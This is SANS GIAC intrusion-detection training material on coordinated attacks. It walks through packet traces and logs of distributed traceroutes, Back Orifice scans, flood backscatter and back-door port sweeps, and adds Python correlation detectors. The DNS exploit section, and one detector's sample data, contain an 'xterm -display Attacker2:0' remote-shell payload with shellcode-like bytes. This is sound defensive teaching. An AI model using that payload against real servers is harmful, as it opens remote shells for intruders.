Coordinated Attacks

IDIC – SANS GIAC LevelTwo
©2000, 2001
Coordinated Attacks
(multiple attackers working together to increase their stealth and firepower)
In this final section we examine data from multiple sources. We begin with the notion of attackers
working together; then we discuss defenders working together. From an attacker's standpoint, coordinated
or distributed attacks offer two primary advantages:
- Stealth. Working from multiple IP addresses spreads the activity thin, so each source stays under
per-source thresholds and the whole is harder to detect. Stealth is further enhanced by hard-to-detect
probing techniques.
- Firepower. Coordinating multiple attacking addresses lets the attackers deliver more exploits at a
target, which may be one site or many, in a smaller time window. It also blunts the defense of blocking
an attacker's address (shunning): drop one source and the others carry on.
External Network Mapping
10:32:24.722 north.mappem.com.38758 > ns.target.net.33476: udp 12
10:32:24.756 north.mappem.com.38758 > ns.target.net.33477: udp 12
10:32:24.801 north.mappem.com.38758 > ns.target.net.33478: udp 12
10:32:24.833 north.mappem.com.38758 > ns.target.net.33479: udp 12
10:32:24.944 north.mappem.com.38758 > ns.target.net.33481: udp 12
10:32:24.975 north.mappem.com.38758 > ns.target.net.33482: udp 12
10:32:26.745 south.mappem.com.48412 > ns.target.net.33512: udp 12
10:32:26.837 south.mappem.com.48412 > ns.target.net.33513: udp 12
10:32:26.930 south.mappem.com.48412 > ns.target.net.33514: udp 12
10:32:27.033 south.mappem.com.48412 > ns.target.net.33515: udp 12
10:32:27.231 south.mappem.com.48412 > ns.target.net.33517: udp 12
10:32:27.436 south.mappem.com.48412 > ns.target.net.33519: udp 12
10:32:26.541 east.mappem.com.58853 > ns.target.net.33491: udp 12
10:32:26.744 east.mappem.com.58853 > ns.target.net.33493: udp 12
10:32:26.836 east.mappem.com.58853 > ns.target.net.33494: udp 12
10:32:26.930 east.mappem.com.58853 > ns.target.net.33495: udp 12
10:32:27.033 east.mappem.com.58853 > ns.target.net.33496: udp 12
10:32:27.232 east.mappem.com.58853 > ns.target.net.33498: udp 12
10:32:27.323 east.mappem.com.58853 > ns.target.net.33499: udp 12
Simultaneous Traceroutes
These are UNIX traceroutes: small UDP probes (12 bytes of payload) aimed at ascending high ports
starting from 33434, one port per probe. The same technique may also be used for network triangulation
and development of network state. Note the detect times; the traceroutes hit the target, a DNS server,
from three locations within a few seconds, which gives the sender timing data for multiple paths at once.
They can then use that state information to determine the best route to this site. The stimulus here was
one of the internal hosts visiting a Web server at the ISP. The ISP wants to give the best possible
service, so it traceroutes back toward the visitor from a couple of backbones, works out which of its
servers is closest, and hands the connection to that server the next time the user clicks a URL.
External Network Mapping Concept
[Slide diagram: a Protected Network reached through Internet routers, probed from endpoints at ISP #1
and ISP #2 that are joined by an out-of-band network.] Goal is to determine what machines make up the
external layer of the protected network.
Here is the concept in cartoons. From multiple endpoints, you fire packets at a single location from
multiple backbones, with the endpoints probably coordinated over an out-of-band network.
Note that you gather a lot of information about the space outside the target network, and the target is
not even aware of it: the probes never need to enter the protected network to map the routers in front
of it.
Also note that in the end there are a finite number of choke points. This is one of our concerns with
this type of information gathering. The state table can be used to give the best possible service, but it
may also be used to orchestrate an attack, because it tells the attacker which few choke points every
path to the site passes through.
Searching for Back Orifice
04:10:34.355832 dax.no.1534 > TARGETBa.31337: udp 19
04:51:15.261462 cpu.com.1534 > TARGETBb.31337: udp 19
04:54:19.101595 dax.no.1534 > TARGETBc.31337: udp 19
06:51:39.392441 dax.no.1534 > TARGETAa.31337: udp 19
06:52:32.700418 cpu.com.1534 > TARGETAb.31337: udp 19
06:06:52.320331 eb.net.1534 > TARGETAc.31337: udp 19
Here is a simple signature, trolling for Back Orifice: UDP to port 31337, 19 bytes of payload, and the
same source port (1534) from every scanner. But before you relax too much, take a closer look. In a short
time frame, three attackers with the same signature were detected at multiple target locations. eb may be
working independently; this machine was not seen at all the attacked sites. Is this a coincidence, or
could the machines be working together? Given the data shown on the slide, it is hard to say.
Even though they were seen at four different locations at fairly close time intervals, it is not possible
to say they were working together. They could simply have the same attack address list or address
generation algorithm and have started an automated process at the same time.
On the other hand, ruling out that the systems are working together might not be wise. Within site A
and within site B, do they tend to scan the same addresses? That would indicate they are using the same
address list. If within A and B they tend to scan DIFFERENT addresses, each scanner covering hosts the
others skip, you have a pattern worth further study: a partitioned address space is what coordination
looks like.
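The two checks the last few slides ask for, multi-source traceroutes against one host inside a short window and the target-set overlap between Back Orifice scanners, as an added example that is not part of the SANS material. The tcpdump lines are constructed copies modelled on the slides (the lone.example.net host is invented as a control), the traceroute port range is the standard UNIX one, and the Jaccard overlap score is my own choice of measure:

```python
import re
from collections import defaultdict

# Constructed sample lines in tcpdump's "time src.port > dst.port: udp len"
# form, modelled on the slides (not the original captures). Three mappem.com
# hosts traceroute the same DNS server within two seconds of each other;
# lone.example.net (invented) traces it half an hour later on its own.
TRACEROUTE_LINES = """\
10:32:24.722 north.mappem.com.38758 > ns.target.net.33476: udp 12
10:32:24.756 north.mappem.com.38758 > ns.target.net.33477: udp 12
10:32:26.541 east.mappem.com.58853 > ns.target.net.33491: udp 12
10:32:26.744 east.mappem.com.58853 > ns.target.net.33493: udp 12
10:32:26.745 south.mappem.com.48412 > ns.target.net.33512: udp 12
10:32:26.837 south.mappem.com.48412 > ns.target.net.33513: udp 12
11:05:00.000 lone.example.net.40000 > ns.target.net.33434: udp 12
""".splitlines()

# Constructed Back Orifice probes (UDP 31337) as seen at sites A and B.
BO_LINES = """\
04:10:34.355832 dax.no.1534 > TARGETBa.31337: udp 19
04:51:15.261462 cpu.com.1534 > TARGETBb.31337: udp 19
04:54:19.101595 dax.no.1534 > TARGETBc.31337: udp 19
06:51:39.392441 dax.no.1534 > TARGETAa.31337: udp 19
06:52:32.700418 cpu.com.1534 > TARGETAb.31337: udp 19
06:06:52.320331 eb.net.1534 > TARGETAc.31337: udp 19
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<src>\S+)\.(?P<sport>\d+)\s+>\s+"
    r"(?P<dst>\S+)\.(?P<dport>\d+):\s+udp\s+(?P<len>\d+)$"
)

# UNIX traceroute sends UDP to 33434 and counts the port up by one per probe;
# the upper bound is a generous cap (30 hops x 3 probes ends at 33523).
TRACEROUTE_PORTS = (33434, 33600)


def parse(lines):
    """Turn tcpdump UDP summary lines into dicts; time is seconds since midnight."""
    records = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        h, mnt, s = m.group("ts").split(":")
        records.append({
            "t": int(h) * 3600 + int(mnt) * 60 + float(s),
            "src": m.group("src"), "sport": int(m.group("sport")),
            "dst": m.group("dst"), "dport": int(m.group("dport")),
            "len": int(m.group("len")),
        })
    return records


def coordinated_traceroutes(records, window=10.0):
    """Targets traced by two or more distinct sources inside `window` seconds."""
    by_dst = defaultdict(list)
    for r in records:
        if TRACEROUTE_PORTS[0] <= r["dport"] <= TRACEROUTE_PORTS[1]:
            by_dst[r["dst"]].append((r["t"], r["src"]))
    flagged = {}
    for dst, probes in by_dst.items():
        probes.sort()
        best = set()
        for i, (t0, _) in enumerate(probes):
            inside = {src for t, src in probes[i:] if t - t0 <= window}
            if len(inside) > len(best):
                best = inside
        if len(best) >= 2:
            flagged[dst] = sorted(best)
    return flagged


def target_overlap(records, dport=31337):
    """Jaccard overlap of the target sets hit by each pair of scanners.

    Near 1.0: they share an address list (or generator and seed).  Near 0.0
    with an otherwise identical signature: the space looks partitioned between
    them, which is the pattern the slide says is worth further study.
    """
    targets = defaultdict(set)
    for r in records:
        if r["dport"] == dport:
            targets[r["src"]].add(r["dst"])
    srcs = sorted(targets)
    overlap = {}
    for i, a in enumerate(srcs):
        for b in srcs[i + 1:]:
            inter = targets[a] & targets[b]
            union = targets[a] | targets[b]
            overlap[(a, b)] = len(inter) / len(union)
    return overlap


def shared_source_ports(records, dport=31337):
    """Source ports each scanner used against `dport`; one fixed port shared
    by every scanner points at the same tool build."""
    ports = defaultdict(set)
    for r in records:
        if r["dport"] == dport:
            ports[r["src"]].add(r["sport"])
    return {src: sorted(p) for src, p in ports.items()}


if __name__ == "__main__":
    print(coordinated_traceroutes(parse(TRACEROUTE_LINES)))
    print(target_overlap(parse(BO_LINES)))
    print(shared_source_ports(parse(BO_LINES)))
```

On the slide data the three mappem.com hosts cluster inside a ten-second window while the control host does not, and every pair of Back Orifice scanners scores 0.0 overlap with an identical source port: the disjoint coverage, not the shared signature, is what makes the case for coordination worth chasing.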
Simultaneous RESET Scans
By Related Addresses
17:40:45.870769 hook.24408 > target1.1457: R 0:0(0) ack 674719802 win 0
17:40:53.025203 hook.33174 > target2.1457: R 0:0(0) ack 674719802 win 0
17:41:12.115554 hook.36250 > target3.1979: R 0:0(0) ack 674719802 win 0
17:43:37.605127 router > hook: icmp: time exceeded in-transit
17:43:43.139158 hook.44922 > target4.1496: R 0:0(0) ack 674719802 win 0
17:42:30.400665 grin.3532 > target1a.1167: R 0:0(0) ack 674719802 win 0
17:42:40.582531 grin.33233 > target2a.1797: R 0:0(0) ack 674719802 win 0
17:44:28.836701 grin.52504 > target3a.1634: R 0:0(0) ack 674719802 win 0
17:47:52.578558 grin.46657 > target4a.2121: R 0:0(0) ack 674719802 win 0
17:47:52.698378 router > grin: icmp: time exceeded in-transit
674719802 is a signature ACK number of a SYN flood: every RST acknowledges exactly the same number, so
every SYN that provoked them carried the same initial sequence number, 674719801. Real TCP stacks do not
do that; a flood tool with a hard-coded ISN does. If you are an analyst, you want to put your quarter on
a denial of service attack. For that to be true, both hook and grin would have to be under attack at the
same time.
Are these a stimulus or a response? A RST is a response. The RSTs are going to target1, target2, and so
on, so hook and grin believe those hosts sent them SYNs: our address range was the spoofed source range
of the flood, and what we see is its backscatter. (RST/ACK rather than SYN/ACK says the flooded ports,
24408, 33174 and the rest, were closed on the victims.)
Let's take a conspiracy theory pause. Even if this really is a denial of service attack against hook and
grin, do they get mapping information about this site? They certainly do; the target site is not behind
a NAT and will give out important data. Note the ICMP error messages: our router answers hook and grin
directly with "time exceeded in-transit", handing the flood's victims (and whoever is watching there) a
live address at our edge.
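The backscatter test described above, as an added example rather than anything from the SANS material: group unsolicited RST/ACK and SYN/ACK segments by the number they acknowledge and flag any ack value that several outside hosts use against many of our addresses. The trace lines are constructed copies of the slide plus one invented unrelated RST (webshop.example) as a control; "router" is assumed to be the site's own router, as the notes imply.

```python
import re
from collections import defaultdict

# Constructed sample in tcpdump's TCP summary form, modelled on the slide.
# target1..target4a are addresses in our own range; hook and grin are outside.
# The webshop.example line is an invented, unrelated RST used as a control.
SAMPLE = """\
17:40:45.870769 hook.24408 > target1.1457: R 0:0(0) ack 674719802 win 0
17:40:53.025203 hook.33174 > target2.1457: R 0:0(0) ack 674719802 win 0
17:41:12.115554 hook.36250 > target3.1979: R 0:0(0) ack 674719802 win 0
17:43:37.605127 router > hook: icmp: time exceeded in-transit
17:43:43.139158 hook.44922 > target4.1496: R 0:0(0) ack 674719802 win 0
17:42:30.400665 grin.3532 > target1a.1167: R 0:0(0) ack 674719802 win 0
17:42:40.582531 grin.33233 > target2a.1797: R 0:0(0) ack 674719802 win 0
17:44:28.836701 grin.52504 > target3a.1634: R 0:0(0) ack 674719802 win 0
17:47:52.578558 grin.46657 > target4a.2121: R 0:0(0) ack 674719802 win 0
17:47:52.698378 router > grin: icmp: time exceeded in-transit
17:50:01.000000 webshop.example.8080 > target5.3001: R 0:0(0) ack 1193046 win 0
""".splitlines()

TCP_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\.(?P<sport>\d+)\s+>\s+(?P<dst>\S+)\.(?P<dport>\d+):\s+"
    r"(?P<flags>[SFRP.]+)\s+\d+:\d+\(\d+\)\s+ack\s+(?P<ack>\d+)\s+win\s+(?P<win>\d+)"
)
ICMP_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+>\s+(?P<dst>\S+):\s+icmp:\s+(?P<msg>.+)$"
)


def backscatter_candidates(lines, min_responders=2, min_targets=3):
    """Group RST/ACK and SYN/ACK replies by the number they acknowledge.

    A flood tool with one fixed initial sequence number provokes replies from
    every victim that all carry ack = ISN + 1.  Several distinct hosts answering
    many of our addresses with the same ack value is backscatter: our range was
    the spoofed source range of the flood.
    """
    by_ack = defaultdict(lambda: {"responders": set(), "spoofed": set()})
    for line in lines:
        m = TCP_RE.match(line.strip())
        if not m:
            continue
        flags = m.group("flags")
        if "R" not in flags and "S" not in flags:   # only RST/ACK or SYN/ACK replies
            continue
        entry = by_ack[int(m.group("ack"))]
        entry["responders"].add(m.group("src"))
        entry["spoofed"].add(m.group("dst"))
    result = {}
    for ack, e in by_ack.items():
        if len(e["responders"]) >= min_responders and len(e["spoofed"]) >= min_targets:
            result[ack] = {
                "implied_isn": ack - 1,          # the flood tool's hard-coded ISN
                "responders": sorted(e["responders"]),
                "spoofed": sorted(e["spoofed"]),
            }
    return result


def icmp_error_leaks(lines, responders):
    """ICMP errors our own devices send to the flood victims; each one hands
    the victim (and anyone watching there) a live internal address."""
    leaks = defaultdict(set)
    for line in lines:
        m = ICMP_RE.match(line.strip())
        if m and m.group("dst") in responders:
            leaks[m.group("src")].add(m.group("dst"))
    return {src: sorted(dsts) for src, dsts in leaks.items()}


if __name__ == "__main__":
    found = backscatter_candidates(SAMPLE)
    for ack, info in found.items():
        print(f"ack {ack} (ISN {info['implied_isn']}): {info['responders']} "
              f"answered {len(info['spoofed'])} of our addresses")
    victims = {r for info in found.values() for r in info["responders"]}
    print("ICMP errors leaked to victims:", icmp_error_leaks(SAMPLE, victims))
```

The single stray RST from webshop.example never reaches the thresholds, which is the point of grouping by ack value first: one RST/ACK is noise, eight of them with the same acknowledgement number from two hosts is a flood somebody else is suffering with our addresses on it.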
DNS ZONE Variation
One IP attacks, the second IP receives the data
01:46:06.41 attacker.23616 > target.domain: S 4076745461:4076745461(0) win 512 <mss 1460>
01:46:06.42 target.domain > attacker.23616: S 2085251122:2085251122(0) ack 4076745462 win 17520 <mss 1460> (DF)
01:46:07.14 attacker.23616 > target.domain: . ack 1 win 31744 (DF)
01:46:07.34 attacker.23616 > target.domain: P 1:3(2) ack 1 win 31744 (DF)
01:46:07.51 target.domain > attacker.23616: . ack 3 win 17520 (DF)
01:46:07.58 attacker.23616 > target.domain: . 3:1463(1460) ack 1 win 31744 (DF)
01:46:07.61 attacker.23616 > target.domain: P 1463:1563(100) ack 1 win 31744 (DF)
01:46:07.61 attacker.23616 > target.domain: F 1563:1563(0) ack 1 win 31744
Courtesy Pedro Vazquez - Unicamp
In the example above, the attacker scans the net until he finds a DNS server that will respond on
53/TCP. He completes the three-way handshake, then pushes just two bytes (the size of the length prefix
every DNS-over-TCP message starts with, which is why this passes for a zone transfer at a glance),
follows with a full 1460-byte segment and a 100-byte tail, and closes with a FIN. That payload is the
attack, and it includes the strings shown on the next slide.
DNS ZONE Variation (2)
One IP attacks, the second IP receives the data
Courtesy Pedro Vazquez - Unicamp
Content from the attack packets (cleaned up of
8bit chars) sent against the DNS servers (target):
%strings ibm|grep bin
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
The point of this is to give them terminal access on the DNS server: if the exploit succeeds, the server
runs xterm with its display pointed at Attacker2, so the shell shows up at a second host that never
touched the target. In this attack, they probe from one site and then open the remote terminal to a
second location. It should be noted that this is a wonderful opportunity to counterattack, but we won't
go there : )
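The content check that catches this variation, added here as an example and not part of the SANS material: pull the printable strings out of a TCP/53 payload the way strings(1) does (dropping the 8-bit bytes, as the slide did), look for an xterm -display, and compare the display host with the host that opened the connection. A mismatch is the "one IP attacks, the second IP receives" pattern. The flows, hostnames (Attacker1/2/3, secondary.ns) and payload bytes are all constructed for illustration:

```python
import re

# Constructed flows: (source host, destination host, destination port, raw
# payload).  The first mimics the slide's attack: the connection comes from
# Attacker1 but the payload asks the DNS server to open an xterm on Attacker2.
# Hostnames and payload bytes are made up for illustration.
FLOWS = [
    ("Attacker1", "target", 53,
     b"\x00\x64\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07"
     b"/usr/X11R6/bin/xterm -display Attacker2:0\x00\xff\xff\xee"
     b"/usr/X11R6/bin/xterm -display Attacker2:0\x00"),
    # A benign-looking DNS-over-TCP payload: 2-byte length, then an AXFR query.
    ("secondary.ns", "target", 53,
     b"\x00\x1d\x12\x34\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
     b"\x06target\x03net\x00\x00\xfc\x00\x01"),
    # Same trick, but the shell is sent back to the probing host itself.
    ("Attacker3", "target", 53,
     b"\x90\x90/usr/X11R6/bin/xterm -display Attacker3:0\x00"),
]

# 7-bit printable ASCII plus tab, the set strings(1) treats as printable.
PRINTABLE = set(range(0x20, 0x7f)) | {0x09}
DISPLAY_RE = re.compile(r"xterm\s+-display\s+(?P<host>[\w.-]+):(?P<display>\d+)")


def strings(data, minlen=4):
    """Runs of at least `minlen` printable bytes, like strings(1) after the
    8-bit characters have been thrown away."""
    out, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= minlen:
            out.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= minlen:
        out.append(run.decode("ascii"))
    return out


def display_redirects(flows):
    """Flag payloads carrying 'xterm -display host:n' and say whether the
    shell goes back to the connecting host or to a third party."""
    hits = []
    for src, dst, dport, payload in flows:
        for s in strings(payload):
            m = DISPLAY_RE.search(s)
            if m:
                hits.append({
                    "src": src, "dst": dst, "dport": dport,
                    "display_host": m.group("host"),
                    "display": int(m.group("display")),
                    # the receiver of the shell is not the host that attacked
                    "third_party": m.group("host") != src,
                })
                break   # one verdict per flow is enough
    return hits


if __name__ == "__main__":
    for hit in display_redirects(FLOWS):
        who = "a THIRD PARTY" if hit["third_party"] else "the attacker itself"
        print(f"{hit['src']} -> {hit['dst']}:{hit['dport']}: xterm to "
              f"{hit['display_host']}:{hit['display']} ({who})")
```

The benign AXFR payload yields only the string "target" and no hit; the third flow matches but the display host equals the source, so it is flagged as a single-host attack, not the split probe-and-receive arrangement the slide describes.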
Correlation
( the current frontier )
• Single sensor coverage is a
computerized form of tunnel vision
• Successful analysis requires:
– Fusing observations from multiple types of
sensors
– Correlating observations from similar
sensors
– Building the answer a piece at a time
In this last part, we want to look at some attacks where the same event, or a similar event, shows up
in more than one log source.
Correlation is one of the most important techniques available to an analyst.
Manual Correlation Benefits
• Primary key to maintain situational
awareness
• System log file and an alert system
administrator can greatly enhance site’s
detection effectiveness
• Correlating system information with
network logs can help scope the size
and intensity of an event
Within a site, correlating ID sensors and system logs is a powerful tool. With TCP Wrappers or the
equivalent logging every connection to syslog, detection is near real time. If there is an alarming
syslog capability such as swatch, the ID sensors can be focused on the connecting host as soon as the
host log fires.
As we correlate logs from multiple sources, we get a better and better picture of what is happening.
This is how we determine how widespread and serious an attack is, and it is what situational awareness
means in practice. A good analyst should never rely on a single type of log file.
Correlation Approach
• Locate secondary sources of data at
your facility (network ID and system
logs)
• To the extent you can, share detect
data with others, source addresses and
detect patterns
• Learn to read a variety of log formats
Many times a different sensor, such as a host log, will have information that a network sensor cannot
give you. However, you have to locate these data sources ahead of time if they are going to be of any
value when you come under attack.
Also, it can take a while to get comfortable with different log formats. We certainly don't know all of
them, but it really makes sense to know the ones at your facility.
Two Perspectives
imhacking.com.4079 > mynetwork.com.21: S 2495131:2495131(0) win 8192 <mss 1460,nop,nop,sackOK> (DF)
mynetwork.com.21 > imhacking.com.4079: S 29790329:29790329(0) ack 2495132 win 8760 <mss 1460> (DF)
imhacking.com.4079 > mynetwork.com.21: . ack 1 win 8760 (DF)
mynetwork.com.21 > imhacking.com.4079: P 1:48(47) ack 1 win 8760 (DF)
imhacking.com.4079 > mynetwork.com.21: P 1:17(16) ack 48 win 16337 (DF)
mynetwork.com.21 > imhacking.com.4079: P 48:86(38) ack 17 win 8744 (DF)
imhacking.com.4079 > mynetwork.com.21: P 17:33(16) ack 86 win 16299 (DF)
mynetwork.com.21 > imhacking.com.4079: P 86:121(35) ack 33 win 8728 (DF)
imhacking.com.4079 > mynetwork.com.21: R 2495164:2495164(0) win 0 (DF)
Black Ice Defender: count=5&victim=z.z.z.z&login=anonymous
The first example shows a complete FTP connection: the three-way handshake to port 21, the server's
47-byte banner, then two 16-byte client commands, each answered by the server (16 bytes is consistent
with "USER anonymous" followed by CRLF). Then the attacker breaks it off with a RST on the last line of
the trace rather than a polite QUIT.
The second data source is BlackICE Defender's record of the same connection. Notice that it provides
additional information the packet headers do not: the victim address, the login name tried (anonymous)
and an event count. The tcpdump headers tell you the connection completed and who tore it down; the
host-based product tells you what was said.
Source Host - Ingreslock
DIAL-A-MATTRESS, NEW YORK, NY, USA
Apr 11 18:21:38 dns1 portsentry[438328]: attackalert:
Connect from host:12.20.24.133/12.20.24.133 to TCP
port: 1524
Apr 11 18:21:40 dns2 portsentry[2259]: attackalert:
Connect from host:12.20.24.133/12.20.24.133 to TCP
port: 1524
Common backdoor port - part one of the story
This detect is taken from the GIAC page, 13-Apr-2000.
These still turn up from time to time. This is simply trolling for an already compromised system.
The attacker breaks in and sets up a port to access later as a back door. 1524 has been a popular one
and is still in use.
This trace used to be listed in the common errors section because so many analysts are satisfied with
any answer. The risk is that an analyst looks the port up in a port list, finds a match (1524 is
ingreslock, the Ingres database lock server), and believes the port list. The trick is to understand
whether the systems are running a service like ingreslock for a reason. Attackers who compromise a
system drop their back door code in and add an entry to inetd.conf that binds this port to it, commonly
an interactive root shell, so a connection attempt to 1524 on a box that has no Ingres is the thing to
chase, not the service name.
PCSERVER - April 2000
DIAL-A-MATTRESS, NEW YORK NY, USA
Apr 12 20:53:58 hosth snort[87556]:
spp_portscan:
PORTSCAN DETECTED from 12.20.24.133
22 connections across 22 hosts:
TCP(22), UDP(0)
Apr 12 20:53:56 12.20.24.133:4973 ->
a.b.e.13:600 SYN **S*****
Apr 12 20:54:01 12.20.24.133:1054 ->
a.b.e.51:600 SYN **S*****
Same source address as the ingreslock detect, one day later
TCP port 600 is pcserver, a common backdoor port, so this is essentially the same problem as ingreslock.
Notice that the two attacks, the one on this slide and the one on the previous slide, are launched by the
same IP address, which is assigned to PC WARE International.
What is going on here? Probably they are looking for ALREADY compromised systems: two known back door
ports from the same source on consecutive days is a sweep for someone else's leftovers, not a fresh
exploit attempt, and it is the correlation across two sensors and two days that tells you so.
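The cross-sensor correlation this section has been arguing for, as an added example that is not part of the SANS material: normalise portsentry syslog lines, Snort's spp_portscan alert and its portscan.log into one event shape, key everything by source address, and report how many sensors, days and ports a single source touched. The log lines are constructed copies modelled on the two slides (the sshd line is an invented control), and the port-to-back-door table is only the two ports the slides name:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed log lines modelled on the two slides: portsentry syslog entries
# from two DNS servers on Apr 11, then Snort's portscan preprocessor alert and
# its portscan.log on Apr 12.  a.b.e.* targets are placeholders as on the
# slide; the sshd line is an invented, unrelated control.
LOG_LINES = """\
Apr 11 18:21:38 dns1 portsentry[438328]: attackalert: Connect from host:12.20.24.133/12.20.24.133 to TCP port: 1524
Apr 11 18:21:40 dns2 portsentry[2259]: attackalert: Connect from host:12.20.24.133/12.20.24.133 to TCP port: 1524
Apr 12 20:53:58 hosth snort[87556]: spp_portscan: PORTSCAN DETECTED from 12.20.24.133 22 connections across 22 hosts: TCP(22), UDP(0)
Apr 12 20:53:56 12.20.24.133:4973 -> a.b.e.13:600 SYN **S*****
Apr 12 20:54:01 12.20.24.133:1054 -> a.b.e.51:600 SYN **S*****
Apr 12 09:15:02 dns1 sshd[1201]: Accepted publickey for admin from 10.0.0.5 port 51022 ssh2
""".splitlines()

# Only the ports the slides identify as common back doors.  A port-list match
# is a lead, not a verdict: confirm against the host's inetd.conf and process
# table before believing the service name.
BACKDOOR_PORTS = {1524: "ingreslock", 600: "pcserver"}

SYSLOG_RE = re.compile(
    r"^(?P<date>\w{3}\s+\d+) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>\w+)\[\d+\]: (?P<msg>.*)$")
PORTSENTRY_RE = re.compile(
    r"Connect from host:(?P<src>[^/]+)/\S+ to (?P<proto>TCP|UDP) port: (?P<port>\d+)")
SPP_RE = re.compile(
    r"PORTSCAN DETECTED from (?P<src>\S+) (?P<conns>\d+) connections across (?P<hosts>\d+) hosts")
SCANLOG_RE = re.compile(
    r"^(?P<date>\w{3}\s+\d+) (?P<time>\d\d:\d\d:\d\d) (?P<src>[\d.]+):\d+ -> "
    r"(?P<dst>\S+):(?P<port>\d+) (?P<flags>\S+)")


def parse_events(lines):
    """Normalise each sensor line to (date, time, sensor, src, port, detail);
    port is None for summary alerts that do not name one."""
    events = []
    for line in lines:
        line = line.strip()
        m = SYSLOG_RE.match(line)
        if m:
            d, t, host, msg = m.group("date", "time", "host", "msg")
            ps, spp = PORTSENTRY_RE.search(msg), SPP_RE.search(msg)
            if ps:
                events.append((d, t, host, ps.group("src"), int(ps.group("port")),
                               f"portsentry: connect to {ps.group('proto')}/{ps.group('port')}"))
            elif spp:
                events.append((d, t, host, spp.group("src"), None,
                               f"snort spp_portscan: {spp.group('conns')} connections, "
                               f"{spp.group('hosts')} hosts"))
            continue
        m = SCANLOG_RE.match(line)
        if m:
            d, t = m.group("date", "time")
            events.append((d, t, "snort-portscan.log", m.group("src"), int(m.group("port")),
                           f"{m.group('flags')} to {m.group('dst')}"))
    return events


def _when(ev):
    """Syslog stamps carry no year; 1900 is fine for ordering one capture."""
    return datetime.strptime(" ".join(ev[0].split()) + " " + ev[1], "%b %d %H:%M:%S")


def timeline_by_source(events):
    """Every sensor's events for each source address, in time order."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[3]].append(ev)
    return {src: sorted(evs, key=_when) for src, evs in by_src.items()}


def scope(events_for_src):
    """How wide and how long one source's activity is: distinct sensors, days
    and ports, and which of those ports the slides call back doors."""
    ports = sorted({e[4] for e in events_for_src if e[4] is not None})
    return {
        "sensors": sorted({e[2] for e in events_for_src}),
        "days": sorted({" ".join(e[0].split()) for e in events_for_src}),
        "ports": ports,
        "backdoor_ports": {p: BACKDOOR_PORTS[p] for p in ports if p in BACKDOOR_PORTS},
    }


if __name__ == "__main__":
    for src, evs in timeline_by_source(parse_events(LOG_LINES)).items():
        print(src, scope(evs))
        for d, t, sensor, _, port, detail in evs:
            print(f"  {d} {t} {sensor:<20} {detail}")
```

Keying on the source address is what turns two portsentry one-liners and a Snort scan alert into one story: the same host touched four sensors, two back door ports and two days, which is exactly the "scope the size and intensity" step the correlation slides describe.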
